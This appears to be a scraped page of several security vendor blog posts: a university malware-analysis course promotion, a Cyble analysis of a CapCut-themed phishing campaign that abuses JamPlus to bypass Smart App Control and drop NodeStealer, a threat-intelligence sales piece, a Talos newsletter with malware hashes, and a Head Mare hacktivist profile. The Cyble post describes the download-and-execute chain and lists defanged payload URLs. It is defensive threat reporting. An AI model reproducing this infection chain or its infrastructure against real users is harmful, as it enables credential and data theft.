Security Training Lab: Educational Program for Universities

September 10, 2024/in Company Blogs

At ANY.RUN, we’ve spent over 8 years tackling cybersecurity industry challenges. We built an interactive sandbox and Threat Intelligence Lookup to streamline malware analysis and investigations for hundreds of thousands of professionals worldwide.

Now, we’re launching Security Training Lab to address another critical need: equipping future cybersecurity professionals with the skills they need to succeed.

What is Security Training Lab

Cyber threats evolve at a rapid pace, making it tough for universities to keep their cybersecurity programs current. Security Training Lab empowers universities to tackle this problem by bridging the gap between theory and practice in cybersecurity education.

The program provides instructors with the tools and resources they need to train students on actual threats, ensuring they graduate with the skills and knowledge to be effective cybersecurity professionals.

Recognizing the value of hands-on experience, our program offers real-world threat simulations and labs using ANY.RUN’s interactive malware sandbox. This gives both teachers and students a safe place to analyze and study actual cyber threats.

By working with real samples of malware and phishing attacks, students will get valuable practical experience in identifying and understanding different types of attacks. The hands-on training will help them develop the skills to detect, investigate, and respond to real-world cyber threats, making them more confident in their abilities.

Key advantages of Security Training Lab

30 Hours of Academic Content: Includes written materials, video lectures, interactive tasks, and tests to provide a well-rounded learning experience.

Access to ANY.RUN Sandbox: Teacher and team licenses for students, ensuring everyone has access to the necessary tools and resources.

Practical Learning: Through real-world threat samples and labs, students gain hands-on experience in analyzing and mitigating cyber threats.

Easy-to-Use Management Platform: A dedicated platform, powered by Seturon, for monitoring student progress, making it simple for educators to track performance and outcomes.

Private Discord Community: A vibrant community for students with tips, lifehacks, and the latest news in cybersecurity, fostering collaboration and knowledge sharing.

On-Demand Integration: Seamless integration with popular Learning Management Systems (LMS), making it easy to incorporate the program into existing curricula.

What Security Training Lab includes

The program is structured into ten modules, each focusing on a critical aspect of malware analysis.

Module

Description

Introduction

Gain basic knowledge about different types of analysis and malware, which is crucial for understanding subsequent analysis methods. You will also learn how to use ANY.RUN and other key tools.

Static Analysis

Study the structure of PE files, strings, hashes, and other static characteristics without executing the file. This includes analysis of WinAPI functions and use of tools for static analysis.

Encryption Algorithms

Learn about the encryption methods used by malware to hide its data and actions. It includes the study of algorithms such as RC4, XOR, AES, RSA, and others.

Advanced Static Analysis

Explore in-depth static analysis, including assembly language, advanced tools, and the programming languages commonly used in malware.

Malware Capabilities

Examine various tactics and techniques that malware uses to conceal its presence, steal data, and protect itself from analysis.

Dynamic Analysis

Observe the behavior of malware in real-time using dynamic analysis tools.

Advanced Dynamic Analysis

Learn to analyze malware behavior, including with the use of debuggers and other advanced tools to monitor code execution.

Script Analysis

Study malicious scripts, their obfuscation methods, and analysis.

Analysis of Office Files

Discover methods for analyzing malicious macros and other threats contained in office files.

Terms and Explanations

The final module, containing explanations of terms and concepts used in the course.

Benefits for universities

Close the expertise gap

Leverage the expertise of our malware analysts via a comprehensive cybersecurity course. Our program allows universities to deliver a modern curriculum that meets industry standards without the burden of recruiting specialized faculty.

Improve training

Provide hands-on experiences that make your cybersecurity program engaging and relevant. Real-world simulations and labs help students apply theory in practice, enhancing their learning and preparing them to handle actual threats.

Manage the course with ease

Use our dedicated platform to monitor student performance to simplify administrative tasks and gain clear insights into each student’s progress. The platform provides tools for tracking assignments, assessing learning outcomes, and identifying areas where students may need additional support.

Benefits for students

Develop in-demand skills

The program offers the critical skills employers are looking for, making you more competitive in the job market. By mastering the latest techniques and tools in malware analysis, you’ll be well-prepared to tackle real-world cybersecurity challenges.

Gain practical experience

Working with actual examples of cyber threats helps you understand the complexity and diversity of attacks. The practical experience is invaluable for developing the skills needed to detect, investigate, and neutralize cyber threats effectively.

Receive a certificate and a discount

Upon completion, students will receive a LinkedIn certificate. We will also provide exclusive student discounts for course graduates.

Join community

Connect and collaborate with peers in our private Discord community. Participate in a supportive environment where you can share knowledge, ask questions, and learn from others.

Integrate Security Training Lab

Interested in bringing Security Training Lab to your educational institution?

Send us a message and our team will get in touch to discuss your specific needs and provide a customized quote.

Get a quote for your academic institution

The post Security Training Lab: Educational Program <br>for Universities appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC)

September 9, 2024/in Company Blogs

Key takeaways

Cyble Research and Intelligence Labs (CRIL) has detected a phishing site masquerading as a CapCut download page. The site aims to trick users into downloading malicious software.

Threat actors (TAs) have leveraged a reputation-hijacking technique by embedding a legitimate CapCut-signed application within the malicious downloaded package, exploiting the trustworthiness of well-known apps to bypass security systems.

This campaign utilizes a recently demonstrated proof-of-concept (PoC) that repurposes the JamPlus build utility to execute malicious scripts while evading detection.

The attack unfolds in multiple stages, employing a mix of legitimate tools, fileless methods, and reputed code repositories such as GitHub to seem legitimate and effectively circumvent traditional security measures.

This campaign’s final payload is a variant of NodeStealer, designed to capture sensitive user information and exfiltrate it through a Telegram channel.

Overview

CapCut, a video editing tool developed by Bytedance, has become increasingly popular. This popularity has extended to CapCut-themed attacks, which are on the rise among TAs. These themes have been frequently used in phishing campaigns. Cyble Research & Intelligence Labs (CRIL) previously identified several phishing websites impersonating the CapCut video editor, and we have discussed these findings in our earlier blog posts. Our latest research discovers a new CapCut-themed campaign deploying stealers such as NodeStealer.

Additionally, TAs have adopted a recently identified technique of reputation hijacking with the JamPlus build utility to deliver final payloads to victims’ systems. This new tactic highlights an evolving trend in attack strategies aimed at bypassing security controls and increasing the success rate of malicious campaigns.

The initial infection occurs when a user downloads a malicious package from a CapCut phishing site. The package contains a legitimate CapCut application, JamPlus build utility, and a malicious”.lua” script. When the user runs the legitimate CapCut application, it triggers the JamPlus build utility, which then executes a malicious “.lua” script. This process utilizes reputation hijacking to mask the execution of the malicious script. This script then downloads a batch file that subsequently fetches and executes the final payload from a remote server. The TAs aim to maintain fileless payloads wherever possible.

This multi-stage process ultimately deploys a stealer payload that resembles NodeStealer. The image below provides an overview of the infection chain.

Technical Details

In this campaign, TAs trick users into downloading a malicious package disguised as a CapCut installer from a phishing site, as shown below.

When the user clicks the “Download” button on the phishing site, it initiates the download of an archive named “CapCut_{random number}_Installer” from the URL: “hxxps://www[.]dropbox[.]com/scl/fi/6se0kgmo7sbngtdf8r11x/CapCut_7376550521366298640_installer.zip?rlkey=7fxladl3fdhpne6p7buz48kcl&st=pzxtrcqc&dl=1”.

Upon extracting the downloaded archive, the user encounters what appears to be a CapCut installer; however, it is a legitimate CapCut application rather than an installer, as shown in Figure 3. The package also includes hidden files intended for malicious activities.

After revealing the hidden files, we discovered that the package contains the JamPlus build utility and a malicious “.lua” script, as shown below.

By default, launching the CapCut shortcut from the desktop runs the CapCut application located at “C:Users<User_Name>AppDataLocalCapCutAppscapcut.exe”. This “capcut.exe” file identifies the latest CapCut application version and then executes the appropriate application from the corresponding folder, as shown below.

In this campaign, TA leveraged this technique by trying to execute a renamed JamPlus build utility instead of the actual CapCut application, as shown below.

In our tests, the JamPlus utility was not executed because the file did not have the expected name, “capcut.exe,” indicating a possible error by the TA in naming the file. However, renaming the file to “capcut.exe” successfully triggers the execution of the JamPlus Build utility.

Upon successful execution, the builder reads instructions from a “. jam” file, which is configured to identify the malicious “.lua” script, as shown below.

After identifying the malicious “.lua” script, the JamPlus build utility loads the “.lua” script file, which executes a shell command, as shown in the figure below. This command employs “curl” to silently download a batch file from a remote server and save it as “C:UsersPublicsteal.bat.” It then executes the downloaded batch file.

This approach demonstrates how TAs utilized a legitimate CapCut application with JamPlus build utility to evade Smart App Control and avoid triggering security alerts.

The batch file contains multiple PowerShell commands that perform the following actions:

1. Downloads a file named “WindowSafety.bat” from a remote URL “hxxps://raw[.]githubusercontent.com/LoneNone1807/batman/main/startup” and saves it in the startup folder, ensuring it runs automatically at the next system startup.

2. Downloads a ZIP file named “Document.zip” from another remote URL “hxxps://github[.]com/LoneNone1807/batman/raw/main/Document.zip” and saves it in the public directory (C:UsersPublicDocument.zip).

3. Extracts the contents of “Document.zip” into a folder named “Document” within the public directory (“C:UsersPublicDocument”).

4. Finally, the batch script executes a Python script named “sim.py”, located in the extracted folder.

The image below shows the contents of the Python script.

The newly launched Python script retrieves base64-encoded data from a new remote server, as highlighted in the above image, decodes it, and executes the resulting payload directly in memory without saving it to disk. This payload is a Python-based information-stealing malware identified as NodeStealer.

NodeStealer

NodeStealer is a sophisticated malware that targets a wide range of sensitive data on a victim’s machine. It steals login credentials, cookies, credit card details, and autofill data from both Chromium-based and Gecko-based web browsers. Additionally, it extracts information from Facebook Ads Manager, Facebook Business accounts, and Facebook API graph pages. NodeStealer also targets browser extensions, including crypto wallets, password managers, VPNs, and gaming applications. All the collected information is then exfiltrated to the TAs via Telegram. This attack has been attributed to a threat actor operating from Vietnam.

Broader pattern of attacks

We have also identified another campaign where TAs used similar techniques to deliver RedLine Stealer. In this campaign, they employed a legitimately signed Postman application in conjunction with the JamPlus build utility. The image below shows that the malicious package includes the Postman application.

Conclusion

The successful hijacking of reputable applications and the JamPlus build utility illustrates a sophisticated method for bypassing Smart App Control without triggering security alerts. This approach significantly elevates the complexity and effectiveness of cyberattacks, complicating detection and defense efforts. The deployment of NodeStealer, which targets sensitive information from the victim’s system, highlights the growing concerns and difficulties within the cybersecurity landscape.

Recommendations

Before accessing or downloading from any site, it is essential to diligently verify the URLs.

Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes.

Implement comprehensive monitoring and logging to detect unusual activities associated with reputable applications.

Employ application whitelisting to ensure that only approved applications can run on systems. This helps prevent unauthorized applications from executing.

Stay updated with the latest threat intelligence and cybersecurity trends to understand new tactics and techniques used by attackers. This knowledge helps in adapting defense strategies accordingly.

Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

MITRE ATT&CK® Techniques

Tactic
Technique ID
Technique Name

Initial Access (TA0027)
Phishing (T1660)
Malware distribution via phishing site

Execution (TA0002)
User Execution (T1204)
The user needs to manually execute the file downloaded from the phishing site.

Execution (TA0002)
Python (T1059.006)
Python stealer is used for targeting Windows users

Defense Evasion (TA0005)
Masquerading (T1036.008)
Downloads file disguised as a legitimate application.

Credential Access (TA0006)
Steal Web Session Cookie (T1539)
Steals browser cookies

Collection (TA0009)
Archive Collected Data
(T1560)
Stealer compresses the stolen data with
ZIP extension.

Exfiltration(TA0010)
Exfiltration Over Web Service (T1567)
Uses Telegram channel to exfiltrate data

Indicators of Compromise (IOCs)

Indicators  
Indicator 
Type 
Description 

8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f
SHA256
CapCut_7376550521366298640_installer.zip

4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10
SHA256
JamPlus Builder – POC file

56d3ba2b661e8d8dfe38bcef275547546b476c35d18aa4ec89eea73c2e2aeb7c
SHA256
Python Stealer

hxxps://raw[.]githubusercontent[.]com/LoneNone1807/batman/main/steal[.]bat
URL
Remote server

hxxps://cap-cutdownload[.]com/
URL
Phishing site

169f7d182f7838b75737c23e1b08c4b6b303d2d6a1cb73cdb87bd9644878a027
SHA256
Copyright-infringement-images.zip

References

https://www.netskope.com/blog/new-python-nodestealer-goes-beyond-facebook-credentials-now-stealing-all-browser-cookies-and-login-credentials

https://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+Redline/31204

https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business

https://www.elastic.co/security-labs/dismantling-smart-app-control

The post Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC) appeared first on Cyble.

Blog – Cyble – Read More

Understanding Threat Intelligence Benefits for a Business

September 8, 2024/in Company Blogs

Editor’s Note: This is an edited version of an article originally posted in October 2023. It has been updated with some new information about ANY.RUN’s threat intelligence products.

As a business owner, you’ve likely invested in a range of security tools like SIEMs, antivirus software, and IDS/IPS systems to safeguard your operations.

You might even have a dedicated cybersecurity team that monitors your systems and responds to incidents such as a SOC (Security Operations Center) or a DFIR (Digital Forensics and Incident Response) team.

But here’s the question: Are your teams equipped to go beyond simply reacting to cybersecurity incidents? If your company underutilizes threat intelligence, chances are they’re not.

Understanding the role of Cyber Threat Intelligence

Cyber threat intelligence involves collecting, analyzing, and interpreting data on potential or current cybersecurity threats. It plays an important role in helping organizations detect and prevent cyberattacks by offering insights into adversaries’ tactics, techniques, and procedures (TTPs).

CTI spans a wide range of activities, from identifying malware variants to monitoring trends in cybercrime, and it involves the use of specialized tools to protect against evolving threats.

Types of threat intelligence tools

What happens in teams that don’t have threat intelligence

Without threat intelligence tools, your teams are essentially flying blind. Consider a situation where a suspicious artifact shows up in your system logs, like an unfamiliar IP address. How does the SOC team immediately identify what this IP means and how to address it effectively?

In short, without threat intelligence, they can’t.

Manual research will be needed instead, requiring the team to pull data from various open-source sources to understand the threat. This process takes time, and time is something you can’t afford to lose during an active attack.

One of the primary goals of threat intelligence is to provide context for artifacts and indicators. Linking an IOC to a specific threat and then to TTPs helps the team understand the exact steps needed to counter the threat.

ANY.RUN’s Threat Intelligence Lookup changes that by delivering real-time contextual data, allowing your teams to link IOCs to threats and threat actor tactics, techniques, and procedures (TTPs) quickly and effectively. Instead of sifting through disparate sources, teams can get actionable insights instantly.

Threat Intelligence Benefits for a Business

But the benefits don’t stop there. Here are 7 more reasons why threat intelligence is crucial for a strong security posture:

1. Reducing the risk of successful cyberattack

Reducing attack risk is a key advantage of threat intelligence. Your SOC team can use real-time threat feeds to get ahead of new threats and deepen their knowledge of TTPs and IOCs.

The data helps in proactively adjusting firewall rules, IDS/IPS signatures, and other security measures, making your defenses stronger. At the same time, the incident response team gains valuable context about attacks, speeding up containment and removal.

2. Preventing Financial Loss

According to IBM, the average cost of a data breach in 2023 is $4.45 million. Finding and containing a breach usually takes months, making prevention a top priority.

Threat intelligence helps your SOC team spot phishing campaigns, fraud attempts, and data exfiltration risks. This protects both financial assets and customer data. By doing this, you avoid expensive breaches, regulatory fines, and the erosion of customer trust that financial setbacks bring.

3. Improving security operations and detection accuracy

Alert fatigue happens when too many alerts overwhelm security specialists, causing them to miss genuine threats. This is often due to frequent false positives and lack of prioritization.

Threat intelligence allows SOC analysts to sort alerts by relevance and risk. They can zero in on high-fidelity alerts that truly matter, cutting down on the noise from low-level threats. This focus lets the team fine-tune IDS/IPS signatures and craft better correlation rules for SIEM systems. The result is a more efficient SOC, with fewer false positives and faster threat identification.

4. Managing vulnerability more accurately

Your vulnerability management team can use threat intelligence to smartly prioritize patches. Instead of wasting time on low-risk vulnerabilities, they can focus on those actively targeted or with known exploits.

Threat intelligence also guides the creation and updating of secure configuration baselines. This data-driven strategy ensures you’re actually shrinking your attack surface, not just ticking boxes.

5. Refining risk analysis

Your risk management team can enhance their risk assessments by incorporating threat intelligence. This gives them a real-time, nuanced view of threats, beyond just historical data or industry benchmarks. They can factor in current events like emerging APTs or zero-days to better gauge risk impact and attack likelihood.

This alignment with the current threat landscape improves decision-making for resource allocation, policy setting, and incident response planning.

6. Improving threat hunting capabilities

Threat intelligence provides crucial insights into the tactics, techniques, and procedures (TTPs) used by attackers, allowing threat hunters to be more proactive. By understanding

these methods, your security teams can actively seek out potential threats before they escalate into full-blown incidents. This proactive approach enables faster detection of anomalous behaviors, reducing the time an adversary can stay in your network undetected.

7. Learning from real-world examples

TI Lookup allows teams to learn more about threat behavior by instantly accessing real-world dynamic analysis. This gives your business access to up-to-date examples of how threats operate, helping security teams better understand malware behavior and strengthen their defenses accordingly.

How Threat Intelligence Lookup Enhances Your Company’s Defense

Threat Intelligence Lookup services, like ANY.RUN’s TI Lookup, provide a powerful way to connect the dots between seemingly unrelated indicators of compromise. This service will help your team gain a clearer understanding of cybersecurity threats, leading to faster and more informed responses.

Here’s why you need to implement Threat intelligence lookup tools into your company’s cybersecurity activities:

Instant context: TI Lookup quickly links important indicators, like IP addresses and file hashes, to known cyber threats, enabling your security team to respond faster to emerging dangers. This saves valuable time and minimizes the risk of costly incidents.

TI Lookup search in ANY.RUN

Advanced OS artifacts: ANY.RUN’s TI Lookup goes beyond surface-level IOCs, providing detailed visibility into OS artifacts, including command lines, registry changes, and mutexes. These insights equip your business with the deeper information needed to investigate complex security threats effectively.

Malware detection with YARA search: By applying YARA rules, TI Lookup can help your team detect malware variants based on file content, making it easier to identify similar malicious samples in your infrastructure.

Yara Search in TI Lookup

Suricata network protection: TI Lookup integrates Suricata detection rules to track network-based threats, identifying malicious traffic patterns that could otherwise go unnoticed. This means, your business is shielded from cyberattacks using the latest network defense strategies.

Suricata rules in TI Lookup

Real-world threat intelligence: Data from live, interactive sessions in TI Lookup ensures that your security team deals with up-to-date, actionable intelligence. This leads to more informed decision-making and quicker mitigation of ongoing threats.

C2 locations lookup: ANY.RUN’s geolocation feature allows users to track and visualize Command and Control (C2) server origins on a live map. By identifying malware families associated with these C2 servers and accessing relevant analysis sessions, your team can filter results based on geography or malware type, making it easier to understand and counter threats targeting your organization.

Malware popularity tracking: ANY.RUN’s malware family tracking feature provides real-time insights into trending malware. You can monitor shifts in malware popularity, easily extract fresh IOCs, and analyze which regions are most affected by specific threats, helping adjust defenses accordingly.

Malware family popularity tracking in TI Lookup

Wrapping up

As you can see, threat intelligence offers multiple business benefits. To sum up, it:

Lowers the chance of successful attacks

Helps prevent or cut down financial losses

Boosts the efficiency and accuracy of security operations

Enables precise vulnerability management

Enhances risk analysis

Interested in expanding your threat coverage?

Right now, you can integrate ANY.RUN’s Threat Feeds to receive the latest IOCs directly from ANY.RUN’s sandbox. They are pre-processed and filtered for false positives.

You can also utilize Threat Intelligence Lookup to speed up your investigations by contextualizing your alerts or artifacts with more information on the malware family and its TTPs, extra IOCs, samples, etc. from our large repository of threat data.

Contact sales to get a 14-day free trial and discover how you can strengthen your company’s cybersecurity today.

Contact sales →

Stay tuned for more exciting updates!

The post Understanding Threat Intelligence Benefits for a Business appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

The best and worst ways to get users to improve their account security

September 8, 2024/in Company Blogs

As most quality thoughts go, my most recent musing on security came about because of fantasy football.

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials.

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA.

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone).

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day.

Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction.

The one big thing

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.

Why do I care?

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures.

So now what?

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.

Top security headlines of the week

A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors. The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record)

A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency. Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been “targeted and compromised” by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher)

The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting “organizations with access to large quantities of cryptocurrency-related assets or products.” A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea’s determination to compromise networks connected to cryptocurrency assets,” the PSA reads. (Dark Reading, FBI)

Can’t get enough Talos?

Vulnerabilities in Microsoft apps for macOS allow stealing permissions BlackByte ransomware group targets VMware ESXi bug Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers

Upcoming events where you can find Talos

LABScon (Sept. 18 – 21) 

Scottsdale, Arizona

VB2024 (Oct. 2 – 4)

Dublin, Ireland

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf
MD5: 2cfc15cb15acc1ff2b2da65c790d7551
Typical Filename: rcx4d83.tmp
Claimed Product: N/A
Detection Name: Win.Dropper.Pykspa::tpd

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0
MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

SHA 256: 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d
MD5: fd743b55d530e0468805de0e83758fe9
Typical Filename: KMSAuto Net.exe
Claimed Product: KMSAuto Net
Detection Name: W32.File.MalParent

Cisco Talos Blog – Read More

Watch our new documentary, “The Light We Keep: A Project PowerUp Story”

September 8, 2024/in Company Blogs

You may have already read about the incredible story of Project PowerUp – how we worked with a multi-company, multi-national team to find a way to keep the lights on in Ukraine in the face of electronic warfare.

Today, we are releasing a short documentary on how this story came to be, while exploring the impact on the daily lives of millions of Ukrainians. The documentary delves into the history of targeted attacks against Ukrainian critical infrastructure, from the Black Energy attack in 2015 and the Industroyer campaign the following year. We then study a unique challenge involving GPS jamming, which came up within a chance conversation over dinner with some of our Ukrainian partners.

We hope this story shines a light on some of the issues faced within an electronic warfare zone, and how sometimes thinking outside of the box isn’t enough. Sometimes, you need to first create the box.

Join our live Q & A with some of the people featured in the documentary or watch it back on demand.

The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis

September 8, 2024/in Company Blogs

Key takeaways

The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine.

Head Mare’s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives.

The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk.

Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine’s military actions.

The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems.

Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient.

Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks.

Overview

The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict.

Head Mare’s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions.

The group’s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus.

The Geopolitical Angle of Head Mare’s Activities

The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group’s attacks are likely intended to support Ukraine’s strategic objectives by applying additional pressure on Russia and Belarus.

The Russian military’s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare’s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus.

The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus’s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations.

Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus’s involvement in the conflict remains complex.

Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka’s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely.

Technical Sophistication and Strategic Intent

Head Mare’s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection.

Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption.

Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems.

Command and Control Infrastructure and Credential Theft

Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle.

Credential theft is another crucial aspect of Head Mare’s strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro3 facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact.

